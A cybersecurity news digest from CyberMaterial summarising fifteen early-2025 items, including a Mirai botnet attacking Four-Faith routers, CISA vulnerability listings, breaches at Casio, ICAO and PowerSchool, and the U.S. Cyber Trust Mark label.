👉 What’s trending in cybersecurity today?

Mirai Botnet, Four-Faith Router Flaws, Global DDoS Attacks, CISA, Mitel MiCollab, Oracle Flaws, Illumina iSeq 100, DNA Sequencer, IBM Concert Software, Sensitive Data, System Integrity, PHP Server Vulnerability, PacketCrypt Cryptocurrency Miner, Green Bay Packers Retail Store, Card Skimmer Script, ICAO, Recruitment System Hack, Orange Finance, Crypto Assets Stolen, Casio, Ransomware Attack, PowerSchool Breach, Student Data, U.S. Cyber Trust Mark, IoT Devices, T-Mobile, Personal Data, Telegram, U.S. Law Enforcement, Veracode, Phylum Assets, Open Source Security, Meta, Fact-Checking Program, Community Notes System.

Listen to the full podcast

🚨 Cyber Alerts

1. Mirai Botnet Targets Four-Faith Routers

A Mirai botnet variant named “gayfemboy” has been leveraging vulnerabilities in Four-Faith industrial routers to orchestrate large-scale DDoS attacks globally. Exploiting over 20 known flaws, including the critical CVE-2024-12856, the malware has compromised devices in countries like China, Iran, and the United States, amassing 15,000 active IPs daily. The attacks, generating traffic of 100 Gbps and targeting hundreds of entities, highlight the botnet’s capability to adapt and expand its reach. Experts warn the evolving tactics of such malware pose a significant risk to industries, governments, and individuals alike.

2. CISA Adds Critical Flaws in Mitel and Oracle

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included three critical vulnerabilities in Mitel MiCollab and Oracle WebLogic Server to its Known Exploited Vulnerabilities catalog. These flaws, including CVE-2024-41713 with a CVSS score of 9.1, could allow attackers to gain unauthorized access to systems or read sensitive files. Federal agencies must apply necessary patches by January 28, 2025, to mitigate potential risks and secure their networks against exploitation.

3. Illumina iSeq 100 DNA Sequencer Flaws

Researchers have identified severe vulnerabilities in the Illumina iSeq 100 DNA sequencing instrument. The flaws stem from outdated BIOS firmware, lack of Secure Boot, and inadequate firmware protections, allowing attackers to overwrite the system’s firmware and potentially disable the device or implant malware. This issue, discovered in the iSeq 100, could lead to critical disruptions, including tampered genetic data and ransomware attacks, especially given the importance of these devices in medical and vaccine research.

4. IBM Concert Software Faces Multiple Flaws

IBM Concert Software has several vulnerabilities that put system integrity and sensitive data at risk. These flaws, found in different components of the software, include critical issues such as stack overflow and DoS conditions, along with improper input validation, posing a severe threat. High-profile vulnerabilities, like CVE-2024-7254 and CVE-2024-52367, highlight the potential for exploitation by attackers to trigger denial-of-service attacks or leak confidential data.

5. PHP Server Flaw Exploited for Crypto Mining

A critical vulnerability in PHP servers, identified as CVE-2024-4577, has been exploited to inject the PacketCrypt Classic Cryptocurrency Miner. This vulnerability, affecting PHP versions running under Windows with certain locales, enables remote code execution through command injection. Various malware, including Gh0st RAT and RedTail cryptominers, have been deployed via this flaw, underscoring its exploitability and quick adoption by attackers.

💥 Cyber Incidents

6. Green Bay Packers Retail Site Breached

The Green Bay Packers reported that their official online store was hacked in October 2024. A threat actor injected a card skimmer script on the checkout page, stealing personal and payment data from affected customers. The team immediately disabled checkout capabilities and launched an investigation, later revealing that the breach occurred between September and October 2024, affecting only a limited set of payment methods.

7. ICAO Confirms Breach of Recruitment Records

The International Civil Aviation Organization (ICAO) confirmed a hack of its recruitment database, affecting over 40,000 records. The compromised data, spanning from April 2016 to July 2024, includes personal information like names, email addresses, and employment history. However, ICAO emphasized that no sensitive data such as financial information or passwords was exposed, and the incident was limited to its recruitment systems, not affecting aviation safety or security.

8. Orange Finance Hack Results in 787K Loss

Orange Finance, a liquidity management protocol operating on Arbitrum, has been hacked, leading to the loss of approximately $787,000 in cryptocurrency. The attacker gained access to the administrator address, upgraded the contract, and transferred the stolen funds to their own wallet. In response, Orange Finance has reached out to the attacker through Arbiscan in an attempt to negotiate the return of the stolen assets. Users are urged to revoke all contract authorizations and cease any interactions with the compromised protocol to prevent further losses.

9. Casio Confirms Leakage of Personal Data

Casio, a major electronics manufacturer, has acknowledged a significant data breach after a ransomware attack in October 2024. The attack led to the leak of personal data from employees, customers, and business partners, including sensitive HR information, contact details, and internal business data. The company revealed that it did not meet the ransom demands of the Underground ransomware group, who claimed to have exfiltrated 204.9 GB of data.

10. PowerSchool Breach Hit Walker County Schools

Walker County Schools in Georgia is addressing a cybersecurity incident involving PowerSchool, the provider of its student information system. The breach, discovered on December 28, 2024, was traced to the unauthorized access of PowerSchool’s customer support portal, PowerSource. According to PowerSchool, information related to families and educators in Walker County was accessed, but there is no evidence of malware or continued unauthorized activity.

📢 Cyber News

11. US Cyber Trust Mark Launched for IoT Devices

The U.S. government introduced the U.S. Cyber Trust Mark, a cybersecurity label aimed at IoT consumer devices. The label will indicate products that meet rigorous cybersecurity standards and will feature a QR code linking to information about security features, updates, and configuration tips. Eligible products include home security cameras, smart appliances, and fitness trackers, while medical devices and certain regulated products are excluded. Manufacturers must have their products tested by accredited labs and submit applications to use the label, ensuring consumers can confidently assess the security of their devices.

12. Washington Sues T-Mobile Over 2021 Breach

Washington state has filed a lawsuit against T-Mobile for failing to adequately protect the personal data of over 2 million residents during a 2021 breach. The breach, which lasted for months undetected, exposed sensitive information, including Social Security numbers, and T-Mobile allegedly misled customers about the severity of the incident. The lawsuit seeks penalties, improved cybersecurity practices, and compensation for affected customers.

13. Telegram Shares User Data with Authorities

Telegram revealed that it fulfilled 900 U.S. government requests in 2024, sharing the phone numbers and IP addresses of 2,253 users. This marks a significant increase over previous years, following a policy shift in September 2024 that expanded data-sharing to include cases beyond terrorism, such as cybercrime and online fraud. While this move aims to comply with authorities, it has drawn attention from cybercrime groups, though the impact on the platform’s criminal landscape remains unclear.

14. Veracode Acquires Phylum to Enhance Security

Veracode, a software code analysis firm, announced its acquisition of key assets from Phylum, a startup focused on software supply chain security. The transaction, which included Phylum’s malicious package analysis and detection technology, aims to bolster Veracode’s ability to identify and mitigate risks in open-source libraries. This acquisition comes as software supply chain attacks are predicted to significantly increase in cost, and Veracode plans to integrate Phylum’s technology into its own products to better protect customers from such threats.

15. Meta Gets Back to the Community System

Meta has announced the end of its fact-checking program, replacing it with a community-driven “community notes” system. CEO Mark Zuckerberg cited a shift towards free speech and a cultural tipping point as the driving factors for the change, noting that the new system would resemble X’s Community Notes. Meta’s previous fact-checking initiative, launched in 2016, had involved over 90 third-party organizations that reviewed content in multiple languages

Copyright © 2025 CyberMaterial. All Rights Reserved.